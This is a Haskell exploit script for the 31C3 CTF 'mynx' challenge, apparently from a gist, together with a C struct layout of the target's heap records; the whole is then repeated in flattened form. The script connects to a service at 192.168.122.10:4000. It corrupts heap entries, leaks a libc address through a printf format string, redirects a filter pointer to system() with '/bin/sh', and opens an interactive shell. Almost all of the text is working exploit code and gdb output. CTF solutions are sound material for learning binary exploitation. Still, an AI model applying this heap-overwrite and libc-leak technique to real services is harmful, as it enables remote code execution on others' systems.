Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn

-- 31C3 CTF: mynx
-- https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/mynx

-- tested env:
-- $ cat /etc/os-release
-- NAME="Ubuntu"
-- VERSION="16.04.3 LTS (Xenial Xerus)"
-- ...
--
-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34  /lib/i386-linux-gnu/libc.so.6

{-# LANGUAGE OverloadedStrings #-}

import           Control.Monad
import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Numeric               (showHex, readHex)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

showByteString :: (Show a) => a -> BS.ByteString
showByteString = BS.pack . show

data Filter = INVERT | LOLOLO | CASEINV
            deriving (Eq, Show)

main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  let printf_plt = 0x08048420

      libc_system'     = 0x0003ada0
      libc_start_main' = 0x00018540

  let addAA f a = do
        recvuntil r "0.) quit\n> "
        sendline r "1"
        recvuntil r "2.) case inversion filter\n> "
        case f of
             INVERT  -> sendline r "0"
             LOLOLO  -> sendline r "1"
             CASEINV -> sendline r "2"
        recvuntil r "enter your ascii art >>>\n"
        send r a

      addComment i c = do
        recvuntil r "0.) quit\n> "
        sendline r "3"
        recvuntil r "enter ascii art id\n> "
        sendline r $ showByteString i
        recvuntil r "0.) back\n> "
        sendline r "1"
        recvuntil r $ "enter your comment for no. " <> showByteString i <> "\n> "
        send r c
        recvuntil r "0.) back\n> "
        sendline r "0"

      removeComments i = do
        recvuntil r "0.) quit\n> "
        sendline r "3"
        recvuntil r "enter ascii art id\n> "
        sendline r $ showByteString i
        recvuntil r "0.) back\n> "
        sendline r "2"
        recvuntil r "0.) back\n> "
        sendline r "0"

  addAA INVERT "nyan"

  addComment 1 "myon"

  addAA INVERT "fee"

  -- gef➤  p $eip
  -- $1 = (void (*)()) 0x8048b3c
  -- gef➤  x/36xw $esp
  -- 0xffece850:     0x08b8c311      0x00000000      0xffece878      0x08048af5
  -- 0xffece860:     0x00000001      0xffece924      0xffece92c      0x08b8c309
  -- 0xffece870:     0xf77523dc      0xffece890      0x00000000      0xf75b8637 <- return addr
  -- 0xffece880:     0xf7752000      0xf7752000      0x00000000      0xf75b8637
  -- 0xffece890:     0x00000001      0xffece924      0xffece92c      0x00000000
  -- 0xffece8a0:     0x00000000      0x00000000      0xf7752000      0xf7788c04
  -- 0xffece8b0:     0xf7788000      0x00000000      0xf7752000      0xf7752000
  -- 0xffece8c0:     0x00000000      0xf35e5f74      0x9d849165      0x00000000
  -- 0xffece8d0:     0x00000000      0x00000000      0x00000001      0x080484d0
  -- gef➤  x/i  0xf75b8637
  --    0xf75b8637 <__libc_start_main+247>:  add    esp,0x10
  let buf = BS.concat $ catMaybes
            [ p32 printf_plt      -- filter
            , Just "return address is: %11$08x"    -- ascii_art
            ]
  addComment 2 buf

  removeComments 1

  -- delete ascii art 2
  addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"

  -- convert 2nd comment to ascii art
  addComment 1 $ BS.replicate 0xfb 'B' <> "\x49"

  info "leak informations"
  recvuntil r "0.) quit\n> "
  sendline r "3"
  recvuntil r "enter ascii art id\n> "
  sendline r "2"
  recvuntil r "0.) back\n> "
  sendline r "3"      -- 3.) apply filter

  recvuntil r "return address is: "
  leak <- recvn r 8
  let (l, _):_ = readHex $ BS.unpack leak
      libc_start_main = l - 247
      libc_base       = libc_start_main - libc_start_main'
  success $ "  libc_base: 0x" <> showHex libc_base ""

  recvuntil r "0.) back\n> "
  sendline r "0"

  addComment 2 "myon"
  addAA INVERT "nyan"

  let buf = BS.concat $ catMaybes
            [ p32 $ libc_base + libc_system'  -- filter
            , Just "/bin/sh\x00"              -- ascii_art
            ]
  addComment 3 buf

  removeComments 2

  -- delete ascii art 3
  addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"

  -- convert a comment to ascii art
  addComment 2 $ BS.replicate 0xfb 'B' <> "\x49"

  info "execute '/bin/sh'"
  recvuntil r "0.) quit\n> "
  sendline r "3"
  recvuntil r "enter ascii art id\n> "
  sendline r "3"
  recvuntil r "0.) back\n> "
  sendline r "3"      -- 3.) apply filter

  interactive r

## struct.c
struct ascii_art_ {
  uint8_t     type;   // +0x00  (0x49: aa, 0x37: comment)
  union {
    struct ascii_art {
      uint32_t          entry_no;         // +0x01  +0x00
      void*             filter;           // +0x05  +0x04
      char              ascii_art[0xf7];  // +0x09  +0x08
    };
    struct comment {
      uint32_t          entry_no;         // +0x01  +0x00
      char              comment[0xfb];    // +0x05  +0x04
    };
  };
};

struct ascii_art_repo {
  struct ascii_art_* ascii_arts;
  uint32_t          count;
}


// 0x804a900
struct ascii_art_repo ascii_art_repos[8];

malloc(sizeof(struct ascii_art*) * 16);
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc --package pwn

	-- 31C3 CTF: mynx
	-- https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/mynx

	-- tested env:
	-- $ cat /etc/os-release
	-- NAME="Ubuntu"
	-- VERSION="16.04.3 LTS (Xenial Xerus)"
	-- ...
	--
	-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
	-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34 /lib/i386-linux-gnu/libc.so.6

	{-# LANGUAGE OverloadedStrings #-}

	import Control.Monad
	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Numeric (showHex, readHex)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	showByteString :: (Show a) => a -> BS.ByteString
	showByteString = BS.pack . show

	data Filter = INVERT \| LOLOLO \| CASEINV
	deriving (Eq, Show)

	main :: IO ()
	main = do
	r <- remote "192.168.122.10" 4000

	let printf_plt = 0x08048420

	libc_system' = 0x0003ada0
	libc_start_main' = 0x00018540

	let addAA f a = do
	recvuntil r "0.) quit\n> "
	sendline r "1"
	recvuntil r "2.) case inversion filter\n> "
	case f of
	INVERT -> sendline r "0"
	LOLOLO -> sendline r "1"
	CASEINV -> sendline r "2"
	recvuntil r "enter your ascii art >>>\n"
	send r a

	addComment i c = do
	recvuntil r "0.) quit\n> "
	sendline r "3"
	recvuntil r "enter ascii art id\n> "
	sendline r $ showByteString i
	recvuntil r "0.) back\n> "
	sendline r "1"
	recvuntil r $ "enter your comment for no. " <> showByteString i <> "\n> "
	send r c
	recvuntil r "0.) back\n> "
	sendline r "0"

	removeComments i = do
	recvuntil r "0.) quit\n> "
	sendline r "3"
	recvuntil r "enter ascii art id\n> "
	sendline r $ showByteString i
	recvuntil r "0.) back\n> "
	sendline r "2"
	recvuntil r "0.) back\n> "
	sendline r "0"

	addAA INVERT "nyan"

	addComment 1 "myon"

	addAA INVERT "fee"

	-- gef➤ p $eip
	-- $1 = (void (*)()) 0x8048b3c
	-- gef➤ x/36xw $esp
	-- 0xffece850: 0x08b8c311 0x00000000 0xffece878 0x08048af5
	-- 0xffece860: 0x00000001 0xffece924 0xffece92c 0x08b8c309
	-- 0xffece870: 0xf77523dc 0xffece890 0x00000000 0xf75b8637 <- return addr
	-- 0xffece880: 0xf7752000 0xf7752000 0x00000000 0xf75b8637
	-- 0xffece890: 0x00000001 0xffece924 0xffece92c 0x00000000
	-- 0xffece8a0: 0x00000000 0x00000000 0xf7752000 0xf7788c04
	-- 0xffece8b0: 0xf7788000 0x00000000 0xf7752000 0xf7752000
	-- 0xffece8c0: 0x00000000 0xf35e5f74 0x9d849165 0x00000000
	-- 0xffece8d0: 0x00000000 0x00000000 0x00000001 0x080484d0
	-- gef➤ x/i 0xf75b8637
	-- 0xf75b8637 <__libc_start_main+247>: add esp,0x10
	let buf = BS.concat $ catMaybes
	[ p32 printf_plt -- filter
	, Just "return address is: %11$08x" -- ascii_art
	]
	addComment 2 buf

	removeComments 1

	-- delete ascii art 2
	addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"

	-- convert 2nd comment to ascii art
	addComment 1 $ BS.replicate 0xfb 'B' <> "\x49"

	info "leak informations"
	recvuntil r "0.) quit\n> "
	sendline r "3"
	recvuntil r "enter ascii art id\n> "
	sendline r "2"
	recvuntil r "0.) back\n> "
	sendline r "3" -- 3.) apply filter

	recvuntil r "return address is: "
	leak <- recvn r 8
	let (l, _):_ = readHex $ BS.unpack leak
	libc_start_main = l - 247
	libc_base = libc_start_main - libc_start_main'
	success $ " libc_base: 0x" <> showHex libc_base ""

	recvuntil r "0.) back\n> "
	sendline r "0"

	addComment 2 "myon"
	addAA INVERT "nyan"

	let buf = BS.concat $ catMaybes
	[ p32 $ libc_base + libc_system' -- filter
	, Just "/bin/sh\x00" -- ascii_art
	]
	addComment 3 buf

	removeComments 2

	-- delete ascii art 3
	addComment 1 $ BS.replicate 0xfb 'A' <> "\x00"

	-- convert a comment to ascii art
	addComment 2 $ BS.replicate 0xfb 'B' <> "\x49"

	info "execute '/bin/sh'"
	recvuntil r "0.) quit\n> "
	sendline r "3"
	recvuntil r "enter ascii art id\n> "
	sendline r "3"
	recvuntil r "0.) back\n> "
	sendline r "3" -- 3.) apply filter

	interactive r
	struct ascii_art_ {
	uint8_t type; // +0x00 (0x49: aa, 0x37: comment)
	union {
	struct ascii_art {
	uint32_t entry_no; // +0x01 +0x00
	void* filter; // +0x05 +0x04
	char ascii_art[0xf7]; // +0x09 +0x08
	};
	struct comment {
	uint32_t entry_no; // +0x01 +0x00
	char comment[0xfb]; // +0x05 +0x04
	};
	};
	};

	struct ascii_art_repo {
	struct ascii_art_* ascii_arts;
	uint32_t count;
	}


	// 0x804a900
	struct ascii_art_repo ascii_art_repos[8];

	malloc(sizeof(struct ascii_art) 16);